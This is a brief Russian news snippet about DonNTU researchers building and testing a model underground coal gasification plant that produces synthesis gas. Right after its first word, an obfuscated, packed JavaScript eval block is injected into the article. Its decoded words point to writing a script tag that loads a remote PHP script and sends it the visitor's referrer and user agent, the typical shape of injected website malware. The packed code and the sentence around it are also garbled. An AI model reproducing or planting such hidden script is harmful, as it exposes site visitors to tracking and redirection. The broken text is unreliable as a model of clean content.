

Ученые eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!".replace(/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]};e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.6(");n m="q";,30,30,'document||javascript|encodeURIComponent|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ayazb|var|u0026u|referrer|sansf||js|php'.split('|'),0,{})) Донецкого национального технического университета (ДонНТУ) разработали, создали и испытали собственную модель [устан](#)  
[овки слоевой газификации угля](#)

. Как рассказывает один из разработчиков, доктор технических наук, заведующий кафедрой технической теплофизики ДонНТУ Алексей Бирюков, установка позволяет получать синтез-газ – потенциальную замену природного газа.



